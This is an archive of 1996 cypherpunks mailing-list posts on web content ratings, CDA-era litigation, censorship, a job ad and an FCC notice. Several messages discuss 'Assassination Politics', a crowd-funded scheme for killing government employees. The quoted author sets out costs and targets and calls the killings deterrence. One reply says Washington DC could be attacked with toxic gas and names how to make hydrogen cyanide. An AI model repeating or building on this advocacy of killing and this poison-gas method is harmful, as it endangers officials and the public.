At  3:27 PM 3/8/96 -0800, Timothy C. May wrote:
>(By the way, adult magazines voluntary label themselves as "adult": my
>understanding from several comments by lawyers and adult industry
>spokesmen, is that they are under no obligation to "voluntarily label"
>their stuff. And some libraries have an _explicit_ policy that says any
>card-holder, of any age, may check out or look at _any_ item the library
>carries.)

IMHO Adult magazines label themselves "adult" as a form of advertising.  In
the same way, a site with a sufficiently hard core self-rating may attract
customers specifically because of the rating.


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Sat, 9 Mar 1996 09:03:07 +0800
To: cypherpunks@toad.com
Subject: 2nd request for links, etc.
Message-ID: <2.2.32.19960308085804.00688710@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

After too much coffee and not enough sleep, it looks like the (soon-to-be-named) shellback.com site will be going on-line on Monday, 11 March. Until InterNIC comes back and blesses us with permission to use the name, we'll be running as 204.177.232.150

I'd like to again ask anyone on the cypherpunks list that has a site, link, file, or other bit of info that they're willing to have us include please let me know via email. I've got some links from my (soon-to-be-former) home page, but I'd like to include a *lot* more stuff.

To repeat an earlier offer, as postmaster, I'm offering the use of our email system for crypto/coder/privacy-related mailing lists, and our drives to store related files/archives.

Dave Merriman
postmaster@shellback.com, webmaster@shellback.com, janitor@shellback.com, and frazzled@shellback.com :-)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMT/aUsVrTvyYOzAZAQEK8wP9GvQtT3PF91xW38jKL7qWsH75fA0AJXVi
fM4pVCDznFUk0DPla8tnBCzyBGQzklZH/217Yct26VvUZN4ZQ+BHkE/ZSkxkk1KQ
i1PE1fzhGcVFhfySIMWi3o7+WeZoYOmdtFkMGEcTAsQkhR9FHvHm3oJlS7GY/R/p
2Hm3Wzjgabc=
=c6ab
-----END PGP SIGNATURE-----
-------------------------------------------------------------
"Giving money and power to government is like giving 
whiskey and car keys to teenage boys."
                    P. J. O'Rourke (b. 1947), U.S. journalist.
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
For privacy tools: http://www.geocities.com/capitolhill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Goldberg@eit.com (Carole Goldberg)
Date: Sat, 9 Mar 1996 12:15:23 +0800
To: cypherpunks@toad.com
Subject: Internet Commerce
Message-ID: <v0213052cad666f332ae5@[205.226.73.110]>
MIME-Version: 1.0
Content-Type: text/plain


EIT/VERIFONE IS A RECOGNIZED PIONEER IN THE DEVELOPMENT OF SOFTWARE AND
SERVICES FOR ELECTRONIC COMMERCE ON THE INTERNET.  EIT IS A WHOLLY OWNED
SUBSIDIARY OF VERIFONE, A LEADING GLOBAL PROVIDER OF TRANSACTION
AUTOMATION.  EIT/VERIFONE RECENTLY ANNOUNCED AN AGREEMENT WITH NETSCAPE
COMMUNICATIONS TO CREATE COMPREHENSIVE INTERNET PAYMENT SOLUTIONS AND AN
AGREEMENT WITH ORACLE TO  COMBINE ORACLE'S POWERFUL WEBSERVER SOFTWARE WITH
VERIFONE'S HIGHLY REGARDED AND SECURE PAYMENT SOFTWARE, TO PRODUCT THE
FIRST PAYMENT-ENABLED WEBSERVER ON THE MARKET.

LEARN MORE ABOUT  EIT AT WWW.EIT.COM

1) Internet Engineer, SET Implementation

Be a member of a team that will implement the SET protocol module (used for
secure credit transactions over the Internet.)  This candidate must have at
least five years experience as a
developer writing commercial grade software using C++.  The minimum
requirements are:

        * Knowledge of (and enthusiasm for) the World Wide Web
        * Experience writing software using ASN encoding rules
        * TCP/IP network programming
        * Significant cryptographic experience
        * Cross platform development experience using both Unix and NT.

  We will be pre-disposed to candidates who have significant experience in:

        * Internet protocols
        * Java
        * Financial networks
        * Site security work
        * Systems programming


2) Internet Engineer  - SET Development

Be a member of the SET development team.  This candidate must have at least
three years experience as a developer  writing commercial grade software
using C++.  The minimum requirements are:

        * Knowledge of (and enthusiasm for) the World Wide Web
        * Cross platform development experience using both Unix and NT.

                and meets at least two of the three following requirements:

        * Experience writing software using ASN encoding rules
        * TCP/IP network programming
        * Significant cryptographic experience

  We will be pre-disposed to candidates who have significant experience in:

        * Internet protocols
        * Java
        * Financial networks
        * Site security work
        * Systems programming


3)     QA  Internet Engineer  - SET Development

Be a member of the SET development team. The candidate must have solid
experience as a QA professional with at least five years of experience in
commercial software development and testing. This position will entail test
design, test writing, and code coverage
analysis of the SET protocol modules.  The minimum requirements are:

        * Knowledge of (and enthusiasm for) the World Wide Web
        * Cross platform development experience using both Unix and NT.
        * Working knowledge of C++
        * Previous experience in White Box testing
        * Detailed understanding of modern QA processes


  We will be pre-disposed to candidates who have significant experience in:

        * Java
        * Financial networks
        * Systems programming
        * Communications Security and Data Security

EIT offers a stimulating work environment along with competitive salaries
and benefits.
We are interested in full-time, contractors, and new graduates
Please send your resume to Carole Goldberg via email, fax, or mail

Fax:  (415) 617-8019     e-mail: Goldberg@eit.com
EIT, 800 El Camino Real, Menlo Park, CA 94025









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 9 Mar 1996 23:00:26 +0800
To: cypherpunks@toad.com
Subject: SurfWatch
Message-ID: <ad65ebd40702100414ba@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:53 PM 3/8/96, Henry Huang wrote:

>Thanks for the clarification.  However, this line of argument applies
>only to "third-party" ratings systems.  Right now, Microsoft/RSAC/SurfWatch
>and SafeSurf/Cybersitter/etc. are setting up competing standards which would
>essentially force people to "self-rate" their own sites, or else be blocked
             ^^^^^
>out by browsers configured to reject unrated sites (a feature Microsoft plans
>to add to its Internet Explorer).

"Force"? Are Cypherpunks now using the language of those who talk about how
Safeway's or KMart's choice of products to carry "forces" customers to buy
certain products? What sort of "force" is being used? Mere handguns, or is
heavy artillery also being used? Are the police called out to raid the
houses of those who refuse to "self-rate"?

Ah, then it really isn't force, is it?

The proper solution is for people unhappy with SurfWatch,
ChristianGuardian, JewScape, and AllahAllowed services is to boycott places
that insist on ratings, create multiple ratings, etc. (Frankly, with
several ratings schemes, and with more coming every day, just how is
Microsoft supposed to "demand" that all posts be rated or they won't carry
them? Or that all sites be labelled as Allah-friendly, Homo-hostile,
whatever? The Usenet is the Usenet, for example, and if Microsoft cuts its
customers off from entire threads, or gaps in threads interfere with the
ability to follow discussions, then they'll clamor for Microsoft to get the
fuck out of interfering.


>The question I have is if these systems were widely implemented, could
>an Web page author or provider of content be sued for "mislabeling"
>their page?  If so, under what circumstances?  Could the RSAC attach

Again, I ask about what sort of _contract_ is involved? (In my case, none.
So, suppose I decide that my post, explaining the fraud that is Islam,
should be read by all Muslims. AllahAllowed, an Islamic rating service, is
upset. Just what is their recourse? I have no contract with them and have
not arranged to label my posts. So, who can sue? The government? Try the
First Amendment.

(By the way, adult magazines voluntary label themselves as "adult": my
understanding from several comments by lawyers and adult industry
spokesmen, is that they are under no obligation to "voluntarily label"
their stuff. And some libraries have an _explicit_ policy that says any
card-holder, of any age, may check out or look at _any_ item the library
carries.)


--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sat, 9 Mar 1996 10:17:05 +0800
To: cypherpunks@toad.com
Subject: Review Litigation
Message-ID: <2.2.32.19960308210308.007380d0@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:59 PM 3/7/96 -0800, Timothy C. May wrote:

>We need to be very careful here. A service like "SurfWatch," voluntarily
>used by others, has entered into no contracts with sites to meet defined
>standards of what should and shouldn't be blocked. It is essentially a
>"review" service, like a reviewer of books, movies, restaurants, etc. Sure,
>some books, movies, and restaurants are "hurt" by negative reviews, but
>this is life in a free society. It has not yet reached the point in these
>Beknighted States that a bad review can be the basis of a tort (though I
>could be wrong...nothing would surprise me these days).

There was a recent case of a restaurant suing over a bad review that did go
to trial.  The reviewer won.  There has also been litigation against someone
who wrote a letter to a scientific journal attacking someone else.  The
letter writer won.  Of course both the letter writer and the reviewer had
legal costs because they were unwilling to proceed in forma pauperis.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Martin Diehl" <mdiehl@dttus.com>
Date: Sat, 9 Mar 1996 09:52:08 +0800
To: cypherpunks@toad.com
Subject: Re: Vexatious Litigants  (was: SurfWatch)
Message-ID: <9602088263.AA826327118@cc1.dttus.com>
MIME-Version: 1.0
Content-Type: text/plain


Henry Huang <hwh6k@fulton.seas.virginia.edu> at INTERNET-USA wrote:
> On Mar 7, 22:29, Timothy C. May wrote: 
> > At 2:38 AM 3/8/96, Bill Frantz wrote:
> > >At  6:59 PM 3/7/96 -0800, Timothy C. May wrote:
> > >>If SurfWatch can be sued for a "bad review," then Siskel and Ebert 
> > >>had better find a new line of work.
> > >
> > >As long as a reviewer corrects errors, as SurfWatch seems to be 
> > >willing to do, I think they are relatively suit-proof.  If they don't, 
> > >well - anyone can be sued for anything.  I'll let the lawyers comment 
> > >on the possibility of success.
>
[snip]


> Thanks for the clarification.  However, this line of argument applies
> only to "third-party" ratings systems.  Right now,
> Microsoft/RSAC/SurfWatch and SafeSurf/Cybersitter/etc. are setting up 
> competing standards which would essentially force people to 
> "self-rate" their own sites, or else be blocked out by browsers 
> configured to reject unrated sites (a feature Microsoft plans to add 
> to its Internet Explorer).

> The question I have is if these systems were widely implemented, could 
> an Web page author or provider of content be sued for "mislabeling" 
> their page?  If so, under what circumstances?  Could the RSAC attach 
> legal requirements to the use of their system, and open up such a 
> loophole (similar to how Sun attaches conditions to the use of its 
> "Java" logo)?

     Seems to me that if the Web page author labels his page 
     conservatively, i. e. "materials may be unsuitable for non-adults; may 
     contain controversial material, may contain views different from your 
     own, etc.".  How can the author be liable for mislabeling?  
     
     Martin G. Diehl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Janzen <janzen@idacom.hp.com>
Date: Sat, 9 Mar 1996 23:37:30 +0800
To: cypherpunks@toad.com
Subject: Re: Vexatious Litigants  (was: SurfWatch)
Message-ID: <9603090028.AA10079@sabel.idacom.hp.com>
MIME-Version: 1.0
Content-Type: text/plain



"Martin Diehl" <mdiehl@dttus.com> wrote:
>Henry Huang <hwh6k@fulton.seas.virginia.edu> at INTERNET-USA wrote:
>> The question I have is if these systems were widely implemented, could
>> an Web page author or provider of content be sued for "mislabeling"
>> their page?  If so, under what circumstances?  Could the RSAC attach
>> legal requirements to the use of their system, and open up such a
>> loophole (similar to how Sun attaches conditions to the use of its
>> "Java" logo)?
>
>     Seems to me that if the Web page author labels his page
>     conservatively, i. e. "materials may be unsuitable for non-adults; may
>     contain controversial material, may contain views different from your
>     own, etc.".  How can the author be liable for mislabeling?

I read Henry's question to refer to the case in which the Web page
author rates a page "too low"; that is, in such a way that despite the
use of RSAC/SurfWatch/etc. software, "undesirable" material gets
through the filter. 

Suppose that an author provides a page which lists, say, clothing-
optional beaches, complete with pictures.  The author rates it as
"suitable for family viewing" -- either naively, believing that no one
will be offended; or deliberately, to make the point that the content is
harmless and _should_ be considered suitable for family viewing; or
simply in order to widen the potential audience.

Henry's question (as I interpret it) is this: If prudish parents now
catch their kid looking at a page with pictures of barenaked people,
figure out why the page wasn't filtered out, and file suit against the
author, what is likely to happen?

ObCrypto, sort of:  What if the page were retrieved through an HTTP
proxy which, unbeknownst to the author (and the filtering service/SW),
deliberately removes or alters the PICS-Label or other rating
information?  The author did, after all, _provide_ the "undesirable"
material....  To what extent does the author's intent matter?  Must Web
authors now add a digital signature to each page (including its rating
info), to prevent tampering? 

--
Martin Janzen           janzen@idacom.hp.com


ObRant: Or, before it comes to that, will people learn to take just
the tiniest shred of [Exon]ing responsibility for themselves and their
[Exon]ing kids?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 9 Mar 1996 10:23:17 +0800
To: cypherpunks@toad.com
Subject: Fertilizer & fuel oil as cause for suspicion - similar to cryptography?
Message-ID: <01I23P9QSQU8AKTTTI@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	In the below article, the cops seem to be claiming that fuel oil,
fertilizer, and bomb-making knowledge = illegal explosives possession. This
idea doesn't make sense.
	Crypto relevance? An example of how governmental idiots are likely to
take cryptography.
	-Allen

-----------------
      Copyright &copy 1996 Nando.net
      Copyright &copy 1996 The Associated Press
      
   CORVALLIS, Ore. (Mar 8, 1996 11:09 a.m. EST) -- Ingredients for a
   fertilizer bomb like the one that killed 169 people in Oklahoma City
   were found on a farm along with bomb-making instructions, guns and
   drugs, police said.
   
   Four people were arrested on weapons and drug charges. Charges
   involving illegal explosives were expected to be filed later, police
   Sgt. Dennis Carson said Thursday.
   
   Officers seized a large quantity of fuel oil and the fertilizer
   ammonium nitrate, two key ingredients in the April 19 Oklahoma City
   bombing.
   
   "My understanding is it could have made a large bomb and a rather
   large explosion had it been detonated," Carson said. "All they had to
   do was mix the parts. It would take just a few minutes."
   
   He wouldn't say how much fertilizer was found in the raid Wednesday
   night near this city about 80 miles south of Portland. The fertilizer,
   found in an 8,000-square-foot barn, was removed in a state police
   bomb-squad truck.
   
   Carson said investigators were trying to determine whether those
   arrested had plans to bomb a building or had ties to any
   anti-government groups.
   
   The federal Bureau of Alcohol Tobacco and Firearms is investigating.
   
   Along with the material for the fertilizer bomb, officers found 29
   guns, including eight assault rifles, and material to make pipe bombs.
   Three ounces of marijuana and some methamphetamine were also found.
   
[...]

   All were charged with drug possession and Luehring and the younger
   Bradley were also charged with being ex-convicts in possession of
   weapons.
   
   Carson didn't have details on their criminal past.

[...]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 9 Mar 1996 23:00:57 +0800
To: jimbell@pacifier.com
Subject: Re: Assasination Politics
Message-ID: <01I23PYHZPC4AKTTTI@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"jimbell@pacifier.com"  "jim bell" 13-FEB-1996 14:53:40.39
>From: Me 
>>	A. My previously mentioned problem with a limited but non-libertarian
>>organization.

>I don't deny that such an organization might spring up.  (Anti-abortion 
>activists are the group which come most immediately to my mind, BTW.  I'm 
>not in sympathy with them; quite the opposite.)  I've never claimed that 
>this system is totally immune to such abuse, in the same way that the seller 
>of a gun can certify that it will never be used to commit a crime.

	I understand and agree with the gun argument. However, it's still a
matter of whether Assasination Politics will overall be better or worse than
the current system. If better, then I'll support it if it becomes necessary (I
still hope for peaceful (or at least relatively peaceful) change - hopefully,
it has not become necessary for the Declaration of Independence's justification
of revolution to be reused). If worse, I won't. I won't try to stop you from
doing so, however (currently, there's no way that I could, for instance).
	Incidentally, by "support" I am meaning making suggestions for
technical improvements. Admittedly, the degree to which I can do so is limited
by my lack of technical knowledge, but I believe I have thought of some
workable refinements.
	As well as the obvious problem of unethical assasinations, there is
also that of a negative reputation being given to various cypherpunk-liked
ideas (anonymous remailers, fully anonymous digital cash, etcetera) if someone
notices this.

>>	B. I don't trust the average person to look ahead enough to make this
>>(or other Anarcho-Capitalist) schemes work.

>Fortunately, "Assassination Politics" will achieve this "crypto anarchy" 
>even if only a tiny fraction of the population participate and use it.  The 
>reason is that the number of decision-maker government employees is 
>comparatively small and most will resign before being "terminated." (with 
>extreme prejudice.)  The total cost to bring down the US government will 
>probably be substantially less than $100 million.

>> In other words, the average person
>>has to be able to see that a non-limited organization is a danger to them,
>>etcetera.

>I realize that this takes a bit of thinking to recognize.  I've thought 
>about this whole thing for nearly a year, now, and it is still a fascinating 
>and yet a bit terrifying subject.

>> Moreover, Jim Bell is ignoring the other sources of propaganda than
>>government in convincing the average person that someone is doing something
>>wrong (when, by my ethics at least, they aren't) - such as religion and
>>various organizations like the PFDA.

>Again, only a tiny fraction of the population needs to participate...

	However, if more of the population participates, they may do stupid
things like using an organization that might strike at them - just as they
currently support a government that can crack down on them. The minority of
intelligent people - the tiny fraction needed for this to potentially work -
isn't a factor for this part. In other words, I'm more worried about too _many_
people - the wrong people - participating rather than too few.

>> Admittedly, as I've stated before, the
>>requirement for some money would help, at least to the degree that our
>>economy is meritocratic. (A growing tendency, fortunately.) If most people
>>are on a subsistence wage (the result of free trade & automation with
>>varying human abilities), they can't afford enough money for Assasination
>>Politics. (Yes, I'm an intellectual Elitist. Deal with it.)

>Since "Assassination Politics" is based on a combined-donation system, even 
>people on a subsistence wage could contribute; a quarter here, a dollar 
>there, pretty soon it turns into real money.

	That is an argument against it. Do you want the people who give to
televangelists being able to more directly have people killed than in the
current system (when at least you've got votes by others to take care of the
problem)? Unfortunately, the same system of ethics that would make one's
targets the right ones also excludes the targets (non-governmental figures)
that can create the problems under this system - like the PFDA leaders.

>I understand your concern.  I wish there was some simple argument I could 
>give which would assuage your fears.  However, I look at it this way:  The 
>Federal government (and all other governments, around the world) are 
>curently parasites on the rest of the population.  Now "parasite theory" is 
>that the parasite has some sort of optimum "parasite level" above which he 
>cannot go.   Once the cost for such parasitism is removed, there will be an 
>economic boom for those "hosts" of the parasite.  Naturally, the parasite 
>will be in trouble, but that's only justice.

	Yes, there would be an economic boom under Anarcho-Capitalism - but
for whom? All the population, or just the intellectual Elite? Now, so long as
the masses (the non-Elite) have at least enough to survive - a subsistence wage
- I wouldn't call this a problem. (Liberals should see Mickey Kaus' _The End of
Equality_ for some liberal arguments to this effect). It's when you go below
that that it's an ethical problem, at least under my ethical system.
(Incidentally, a similar argument can be made about some other issues, such as
campaign finance reform. Equality before the law means equality before the
judiciary, not equality before the legislature or the executive. Otherwise, how
could one have media that weren't government-controlled?) 
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Henry Huang <hwh6k@fulton.seas.virginia.edu>
Date: Sat, 9 Mar 1996 23:37:28 +0800
To: cypherpunks@toad.com
Subject: FCC Sets Comment Date for Internet Phone Call Rulemaking (fwd)
Message-ID: <199603082153.QAA36908@fulton.seas.Virginia.EDU>
MIME-Version: 1.0
Content-Type: text/plain


------- Start of forwarded message -------
Date: Fri, 8 Mar 1996 15:33:21 -0600
Errors-To: borton@macc.wisc.edu
Reply-To: telecomreg@relay.doit.wisc.edu
Originator: telecomreg@relay.doit.wisc.edu
Sender: telecomreg@relay.doit.wisc.edu
Precedence: bulk
From: "Neal J. Friedman" <njf@commlaw.com>
To: Multiple recipients of list <telecomreg@relay.doit.wisc.edu>
Subject: FCC Sets Comment Date for Internet Phone Call Rulemaking
X-Listprocessor-Version: 6.0b -- ListProcessor by Anastasios Kotsikonas
X-Comment: Requests (UNSUBSCRIBE/HELP) to: listserver@relay.doit.wisc.edu
X-Mailer: Windows Eudora Light Version 1.5.4b11 (32)

The FCC has acted with astonishing speed in setting a date for comments on
the ACTA petition to regulate telephone calls via the Internet.  It is not
uncommon for rule making petitions to sit for weeks, months, even years
without action.  ACTA filed its petition on March 6th and two days later the
FCC issued a Public Notice seeking comment.  The deadline for comments is
April 8, 1996 with reply comments due 15 days later.

After reviewing the comments, the FCC will either terminate the proceeding
without further action or issue a Notice of Proposed Rule Making seeking
further comments on a proposed rule.

Time is of the essence for those who may be interested in opposing the
Notice.  Our law firm would be available to represent parties who may wish
to file joint comments in opposition.  Please contact me privately if you
have any interest.
  _____________________________________________________________
 |Neal J. Friedman  | Pepper & Corazzini, LLP   |Voice:       |
 | njf@commlaw.com  |   1776 K Street, N.W.     | 202-296-0600|
 |Telecommunications|       Suite 200           |Fax:         |
 |& Information Law |  Washington, D.C. 20006   | 202-296-5572|  
 |                                                            |              
 |	       Web Server:  http://www.commlaw.com/           |
 |____________________________________________________________|
        


------- End of forwarded message -------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Sat, 9 Mar 1996 10:55:46 +0800
To: cypherpunks@toad.com
Subject: Re: U.S. State Dept criticizes Chinese net-censorship
Message-ID: <9603082204.AB04688@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- From State dept about China:
> Government control  
> of news media generally continues to depend on self-censorship to       
> regulate political and social content, but the authorities also         
> consistently penalize those who exceed the permissable. 

It is this kind of double talk, "self-censorship", that makes
possible the US govt. to do the exact same as China's one does.

There is no such thing as "self-censorship".  Either you stick to 
your values, and then it is *not* censorship, or then you do not,
and then, it is neither.

The *only* ultimate tool of censorship is a gun.

JFA


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQEVAwUBMUBUDMiycyXFit0NAQExqQf+JxkWi4BhPwQSXtzscf+AGGA++5dZjTmP
3mkhsPzT1JKT1Pl4LXVLbCEJctv+yeLOq1sRYV3rcdIZOIwh1cvfPoWI8LFqfCH4
63nkX6eTG+6VR1uCOMCuTfJFx/f86v5Y34ehfQDzGzcN2SrxCSXpDFwHuTMpB6/g
6Zjhspfqz8PT7U9vHbyHkytXBI9BdR9b6+WUkJMHMpflrDDbSTrsR+C3XObIO4gu
85l4/HjUqSf+EyAw9/Bv3J5uUFF45o+ff6BvWt5eVUMTgWEBcJkjHbm/JYgj7lrK
Bjm3oXboh940zHIRIkjb56SRFEb2ITNSfoKilXLgq3CV9r/+Wx5q4g==
=UnIn
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 9 Mar 1996 23:00:43 +0800
To: jimbell@pacifier.com
Subject: Re: V-chips, CC, and Motorcycle Helmets
Message-ID: <01I23QL2OC22AKTTTI@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"jimbell@pacifier.com"  "jim bell" 14-FEB-1996 05:12:52.66
>At 07:36 PM 2/13/96 -0800, Bill Frantz wrote:
>>At  8:15 PM 2/13/96 -0500, Declan B. McCullagh wrote:

>Actually, I think the primary targets will be either the middle level 
>manager types, or the ones who have attracted a substantial amount of bad 
>publicity by "following orders."  Lon Horiuchi (the sniper who shot Vicki 
>Weaver) for example, would be a excellent example of a person who'd try to 
>claim, "I was just following orders."  Okay, maybe he was, but so was Adolph 
>Eichmann.  

>Once the tax collectors/enforcers were targeted, the rest of the government 
>wouldn't be able to operate, and would collapse.

	One difficulty in this is that the middle managers - the most vital
ones in the long run - are also the ones that can best protect themselves using
the net and various cypherpunks techniques - partial (not to their superiors)
anonymnity with persistent, verifiable pseudonyms. If they don't directly
deal with the public, they're kind of hard to target.

>>If, after a couple of the Waco people had been hit, I was given the
>>responsibility to protect them I would proceed as follews:
>>
>>(1) Gather them and their families onto some Army base and step up the
>>patrols.  Now I have them safe.

>And, of course, you've just ruined their lives.  Think about it.  By doing 
>this, it is made absolutely, completely, and abundantly clear to them that 
>THEY are considered "the enemy" and that their lives are forever put at 
>risk.   Previously, government employees could hold their heads up high and 
>be proud of their "public service."  Now, if they're discovered, they have 
>to disappear.  Does this treatment sound familiar?  Their job description 
>and circumstances will more closely resemble that of a Mafia enforcer than a 
>proud public servant.  They'll have to teach their children to lie about 
>what their parent does, rather than risk getting exposed.

	You have an interesting point about motivations and the likely
psychological effects. Given the headaches that counterintelligence goes
through in wars - nobody wants to shut up - such secrecy would be difficult.

>Who, exactly, would want to work for the government under such 
>circumstances?  Remember, we're not just talking about a tiny fraction of 
>their number; if the most egregious ones were hidden the ones that were less 
>secure would be killed in their place.

	Would they? You appear to be assuming that with less targets available,
people will start being less selective. You may be correct.

>>(3) Make sure that the names/faces of the cannon fodder in future actions
>>are not available to make it harder to target the guilty.

>Then they'll target the "names," the ones who show their faces.  See how this 
>works?  If the only way  you can maintain the government is to keep them all 
>absolutely anonymous, then that government has FAILED.

	Has it? Currently, we've got the guys who deal with the public (the
politicians and the low-level bureaucrats) and the faceless drones (the rest
of the bureaucrats). The politicians can be protected, and already are to some
degree. The low-level bureaucrats aren't _that_ likely to be targeted by enough
people to make a difference, and the ones who go bad enough to do so can be
protected (or sacrificed, if that seems to be the way to keep the public
happy). The faceless drones can be even more faceless, and so very hard to
target.

>Furthermore, this system's anonymity allows disgruntled public employees the 
>chance to collect money by "turning in" their bosses to the public's ire; if 
>the personnel list for the government is nominally a secret, it will "leak" 
>eventually and those on the list will be followed, confirmed, and targeted.

	That's an interesting point. I can see some sort of Blacknet-variety
system developing to distribute information and get paid for it, even if the
employee in question doesn't want to do the hit themselves, although the
payment part could be a problem. Even with the partial anonymnity protections
I mention above, _somebody_ will know who the person who ordered another Ruby
Ridge is - I doubt a government could operate with full internal anonymnity.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Corey Minter <cminter@mipos2.intel.com>
Date: Sat, 9 Mar 1996 13:44:28 +0800
To: cypherpunks@toad.com (Cypherpunks List)
Subject: I don't think I'm on the mailing list anymore.  What's going on?
Message-ID: <199603090110.RAA10105@zws388.sc.intel.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi,

I'm not getting any more mail from this list.  Does anyone know
what could have happened?

Maybe it's a CDA crackdown :)

If anyone knows could you email me directly?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Sat, 9 Mar 1996 11:38:44 +0800
To: cypherpunks@toad.com
Subject: hammers, crowbars and remailers & Leahy
Message-ID: <9603082223.AA05907@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


What is the difference between an small hardware store owner
selling a hammer and a crowbar to a guy that will commit burglary
and
a remailer owner providing services to , say, the same burglar 
who wants to sell his stolen goods.

Would an anonymous phone call notifying the hardware store owner that
somebody will buy tools that will be used to commit a crime
be significant?

Any comments?


JFA

Typical govt reasonning:
The first cause of death is life, therefore life should be
outlawed!  Yeah, let make a new law!  It'll be fun!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 9 Mar 1996 11:42:52 +0800
To: jimbell@pacifier.com
Subject: Re: Assassination Politics(tm) was V-chips, CC, and Motorcycle Helmets
Message-ID: <01I23R7C8HFKAKTTTI@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"jimbell@pacifier.com"  "jim bell" 16-FEB-1996 03:25:12.58
>At 02:18 PM 2/15/96 -0800, Bill Frantz wrote:

>BTW, for the record, just a couple of days ago Clinton probably passed 
>within a mile of my house, "Slant range", in a helicopter, with a day's 
>warning.  (The term, "slant range", is a "term of art," for those not in the 
>know.)

	Yes; one could also take out a great deal of Washington DC via toxic
gas. (If it weren't flammable, hydrogen cyanide would work nicely; just mix
potassium cyanide and hydrochloric acid). Unfortunately, this would also kill
a lot of innocent people (including, under my system of ethics at least, some
governmental types. Look at Governor John P. Altgeld if you don't believe that
any can exist; he pardoned the Haymarket riot scapegoats, and ruined his
political career by doing so).

>Now, imagine you were a government employee in this line of work, and a 
>fellow employee was bumped off due to a well-publicized incident.  Next time 
>you're asked to engage in a Waco-like operation, what do you think you'll 
>say to  your manager?   "Is this trip necessary?"

>This is called, "deterrence."

	You have a point. Of course, this gets back to the ever-present debate
over whether the death penalty causes deterrence or not. I suspect it doesn't
for most gang members; whether the actual (as opposed to rhetorical) psychology
of governmental employees would predict the same is an interesting question.
 
>Now, I think statistics show that each year, about 800 billion dollars in  
>individual income taxes are collected.  If we assume that the equivalent of 
>only 1% of that  value  was donated to solve the "IRS problem," that's 8 
>BILLION dollars, which at $10,000 per person would buy 800,000 deaths.  
>THat's 7 times the current employment of the IRS.

>You tell me:  What would the average person pay THIS YEAR to avoid paying, 
>say, a $100,000 tax bill NEXT YEAR?  (Hint:  How much do rich people pay 
>their accountants, TODAY, to avoid taxes?)

	You've got a "tragedy of the commons" problem. Everyone would assume
that everyone else would do it. (Admittedly, that libertarians have among the
highest charitable donation rates of any group may argue otherwise). Now,
targeting whoever audited you is a quite likely possibility.

>Another Hint:  Consider Bill Gates.  His wealth is variously estimated at 
>over 10 BILLION dollars, probably almost all of which is in long-term 
>capital gains (Microsoft stock), for which he will have to pay somewhere 
>around 30% in Federal income taxes if he should choose to cash out.  He 
>would be 1.5 Billion dollars ahead if he donated $1.5 billion dollars to an 
>organization which would eliminate his  requirement to pay the total 3 
>billion dollar tax bill to the IRS.  That alone is the equivalent of about 
>$14,000 for each IRS employee.

	You have an interesting point here.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 9 Mar 1996 11:29:58 +0800
To: John Young <jya@pipeline.com>
Subject: Re: SLE_aze
In-Reply-To: <199603081618.LAA21645@pipe4.nyc.pipeline.com>
Message-ID: <Pine.SUN.3.91.960308173015.23674A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


>  
>    SLE_aze (for 3) 





